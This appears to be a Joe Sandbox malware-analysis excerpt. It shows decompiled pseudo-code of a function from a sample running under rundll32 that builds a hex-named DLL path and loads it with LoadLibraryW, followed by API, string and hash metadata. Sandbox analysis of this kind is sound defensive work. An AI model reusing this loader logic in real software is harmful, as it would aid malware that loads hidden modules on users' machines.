                                                                      				char _v140;
                                                                      				WCHAR* _t12;
                                                                      				intOrPtr _t17;
                                                                      				void* _t22;
                                                                      				intOrPtr _t23;
                                                                      				intOrPtr _t29;
                                                                      				intOrPtr _t32;
                                                                      				void* _t43;
                                                                      				void* _t54;
                                                                      				WCHAR* _t55;
                                                                      				char* _t56;
                                                                      				WCHAR* _t57;
                                                                      				intOrPtr _t58;
                                                                      				char _t60;
                                                                      				struct HINSTANCE__* _t61;
                                                                      
                                                                      				_t43 = 0;
                                                                      				_t12 = E041B90EA(__ecx, 0x152a);
                                                                      				_t58 =  *0x41d0fd8; // 0x439fc50
                                                                      				_t55 = _t12;
                                                                      				_t59 = _t58 + 0xb0;
                                                                      				_v8 = _t55;
                                                                      				E041BC08E( &_v140, 0x40, L"%08x", E041BE605(_t59, E041BCE25(_t58 + 0xb0), 0));
                                                                      				_t17 =  *0x41d0fd8; // 0x439fc50
                                                                      				_t3 = _t17 + 0xa8; // 0x1
                                                                      				asm("sbb eax, eax");
                                                                      				_t22 = E041B90EA(_t59, ( ~( *_t3) & 0x000010d8) + 0x2f7);
                                                                      				_t56 = "\\";
                                                                      				_t23 =  *0x41d0fd8; // 0x439fc50
                                                                      				_t60 = E041B9924(_t23 + 0x1020);
                                                                      				_v12 = _t60;
                                                                      				E041B9D66( &_v8);
                                                                      				_t29 =  *0x41d0fd8; // 0x439fc50
                                                                      				_t57 = E041B9924(_t29 + 0x122a);
                                                                      				_t32 =  *0x41d0fa0; // 0x439f8a0
                                                                      				_v8 = _t57;
                                                                      				 *((intOrPtr*)(_t32 + 0x120))(_t60, _t57, 0, _t56,  &_v140, ".", L"dll", 0, _t56, _t22, _t56, _t55, 0);
                                                                      				_t61 = LoadLibraryW(_t57);
                                                                      				if(_t61 != 0) {
                                                                      					_push(_t61);
                                                                      					_t54 = 0x3c;
                                                                      					_t43 = E041B9446(0x41cd9bc, _t54);
                                                                      				}
                                                                      				E041B913B( &_v12, 0xfffffffe);
                                                                      				E041B92A2( &_v140, 0, 0x80);
                                                                      				if(_t43 != 0) {
                                                                      					 *0x41d10ac = _t61;
                                                                      					 *0x41d10b4 = _t57;
                                                                      				} else {
                                                                      					E041B913B( &_v8, 0xfffffffe);
                                                                      				}
                                                                      				return _t43;
                                                                      			}

                                                                      APIs
                                                                        • Part of subcall function 041BC08E: _vsnwprintf.MSVCRT ref: 041BC0AB
                                                                        • Part of subcall function 041B9924: lstrcatW.KERNEL32(00000000,?), ref: 041B9963
                                                                      • LoadLibraryW.KERNEL32(00000000), ref: 041BA2F2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true
                                                                      • Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad_vsnwprintflstrcat
                                                                      • String ID: %08x$dll
                                                                      • API String ID: 1445519121-2963171978
                                                                      • Opcode ID: 05de103cda07c27ef5742f3470262c0c7323fa11bf5d3442a1da56041be9540d
                                                                      • Instruction ID: 8bc30f27ed0648590cb1e815f7884f74c1f8bfa204532a0459412a4b22064ba1
                                                                      • Opcode Fuzzy Hash: 05de103cda07c27ef5742f3470262c0c7323fa11bf5d3442a1da56041be9540d
                                                                      • Instruction Fuzzy Hash: FB31B5F2A01214BBE710A669DDC5FDF37ACDB88758F144169F244E7280EB78AD4587A0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%